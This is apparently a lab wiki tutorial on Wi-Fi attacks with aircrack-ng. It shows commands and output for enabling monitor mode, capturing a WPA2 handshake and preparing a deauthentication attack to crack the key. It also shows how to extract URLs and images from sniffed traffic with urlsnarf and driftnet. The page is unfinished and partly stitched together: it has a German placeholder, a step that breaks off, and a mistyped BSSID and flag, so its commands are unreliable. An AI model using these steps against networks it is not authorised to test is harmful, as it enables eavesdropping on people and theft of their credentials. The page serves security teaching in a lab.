WiFi Sniffing

Summary

Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection (*). WPA/WPA2 uses various types for authentication. Aircrack-ng is only capable of cracking pre-shared keys! Meaning only networks using PSK can be attacked. (To determine if a network uses PSK, airodump-ng is used). The method used to crack the pre-shared key is a plain brute force attack. This means the PSK needs to be in the used dictionary for the brute force attack. If it is not in the list, aircrack-ng can not determine the key. For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP, when a client tries to connect to the network.

Requirements

• Operating system: Kali Linux 64 Bit
• Wireless card: One that can inject packets Injection test

Prerequisites

The following information of the hardware used is needed:

• MAC of PC running the attack:
• MAC of a wireless client in the network:
• BSSID:
• ESSID:
• Channel used by AP:
• Wireless interface:

Description

Overview

The following steps are needed to get the password:

1) Use monitor mode on the wireless interface using the AP channel

2) Using airodump-ng on AP channel, collecting needed handshake

3) Use aireplay-ng to deauthenticate a wireless client in the network

4) Use aircrack-ng to crack the key using the collected handshake

Step 1 - Use monitor mode on the wireless interface using the AP channel

To listen to every packet in the air the wireless card needs to be in monitor mode. If a wireless card is not in monitor mode it will only catch every packet addressed to itself. When listenting to every packet send an attacker eventually captures a 4-way handshake used to crack WPA/WPA2. Additionaly one can deauthenticate wireless clients, explained in a later step.

Depending on the driver used by the card, different methods need to used to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver, for further information look at aircrack-ng's tutorial

Open a terminal and type :

airmon-ng

to determine the driver your card is using. The ouput with a wireless card from Atheros is the following:

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n

The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we dont know the used channel from the AP we only start the monitoring mode without a specific channel:

airmon-ng start wlan0 

Ouput:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
   PID Name
   605 NetworkManager
  2948 wpa_supplicant
PHY     Interface       Driver          Chipset
phy0    wlan0mon        ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
               (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

Now we can check if the interface is in monitormode using iwconfig:

iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
tun0      no wireless extensions.
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
         Retry short limit:7   RTS thr:off   Fragment thr:off
         Power Management:off

As we can see the interface changed the name from wlan0 to wlan0mon and uses the monitor mode. With airodump-ng <interface> we can monitor all AP's within reach.

airodump-ng wlan0mon

The output presented shows all AP's with information like ESSUD, BSSID, PWR, beacons, channels, encryption, cipher and authentication methods used

CH  4 ][ Elapsed: 1 min ][ 2021-12-17 10:40                                                                                                                                                                                        
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                                    
68:02:B8:1F:A1:3A  -50       46       31    0  11  130   WPA2 CCMP   PSK  WLAN18250073

Important for the further attack is the BSSID (69:02:B8:1F:A1:3A) and the used channel (11).

Step 2 - Using airodump-ng on AP channel, collecting needed handshake

Now we got the BSSID and channel of the AP we can start capturing the 4-way handshake. With the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface>

airodump-ng -c 11 -bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon

Ouput:

output muss noch rein

Now the tool starts collecting every packet from this AP. It can take quite a while, until a 4-way handshake is made. Step 3 helps to speed things up.

Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network

A faster way to capture the 4-way handshake is to connect with an additional client to the wireless network manualy. When connecting to the new network, the AP starts the 4-way handshake. Because this is impractical an attacker can deauthenticate clients already connected to WiFi network to reinitialize the 4-way handshake. BSSID and MAC of the device to deauthenticate are needed to conduct the attack.

---

Display your wireless interfaces:

iwconfig

Connect the external Wi-Fi adapter to your host computer.

iwconfig

The newly added interface in the list is the external adapter. In my case it was 'wlan1'. In the following steps I refer to the external adapter as 'wlan1'.

Start monitor mode on the external adapter (**):

airmon-ng start wlan1

The previous command creates a new interface called 'wlan1mon'. Verify with:

iwconfig

Display active Wi-Fi networks:

airodump-ng wlan1mon

Remember the channel of the network you want to attack. In my case it was channel 11.

Set your adapter to the appropriate channel:

iwconfig wlan1mon channel 11

Verify the frequency:

iwconfig wlan1mon
iwlist channel

Start capturing data:

airodump-ng --channel 11 -w alfa wlan1mon

Filter URLs from captured traffic:

urlsnarf -p alfa-01.cap

Filter pictures from captured traffic:

driftnet -f alfa-01.cap -a -d Pictures/

Disable monitor mode:

airmon-ng stop wlan1mon

---

(*) Test if the adapter supports injection:

aireplay-ng -9 wlan1mon

Detailed information about wireless adapters available in ELVIS can be found here.

(**) This command did not work with ALFA NETWORK AWUS036ACH and ALFA NETWORK AWUS036EAC. The following commands are an alternative way to start monitor mode on the adapter:

ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up

Results

Browser	urlsnarf	driftnet
Microsoft Edge (Windows 10 host)	no results reading the pcap file	no results reading the pcap file
Mozilla Firefox (Windows 10 host)	no results reading the pcap file	no results reading the pcap file
Google Chrome (Windows 10 host)	no results reading the pcap file	no results reading the pcap file
Google Chrome (Android host)	no results reading the pcap file	no results reading the pcap file
Samsung Internet (Android host)	URLs captured	images captured

Used Hardware

• Windows 10 host
• Kali Linux host
• Samsung Galaxy A8
• LG Nexus 5X Google Smartphone 32 GB, Android 6.0 Marshmallow, Carbon
• Panda 300 Mbps Wireless N USB Adapter PAU05
• Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter
• Alfa AWUS036EAC AC1200 USB Wireless Adapter

References

• https://www.androidauthority.com/capture-data-open-wi-fi-726356/
• https://www.aircrack-ng.org/doku.php?id=airmon-ng
• https://www.aircrack-ng.org/doku.php?id=airodump-ng
• https://www.aircrack-ng.org/doku.php?id=injection_test
• https://www.aircrack-ng.org/doku.php?id=cracking_wpa